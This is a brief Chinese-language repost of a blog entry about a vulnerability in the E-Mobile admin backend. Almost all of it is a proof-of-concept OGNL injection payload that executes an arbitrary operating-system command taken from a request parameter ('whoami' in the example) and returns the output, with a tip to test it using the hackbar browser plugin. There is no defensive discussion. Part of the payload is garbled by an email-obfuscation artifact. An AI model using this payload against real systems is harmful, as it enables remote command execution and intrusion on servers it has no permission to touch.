E-Mobile 后台管理系统漏洞

转载：https://blog.csdn.net/qq_27446553/article/details/68203308

E-Mobile 后台管理系统漏洞
可以通过火狐hackbar插件进行验证
Poc :

message=(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

复现图片如下：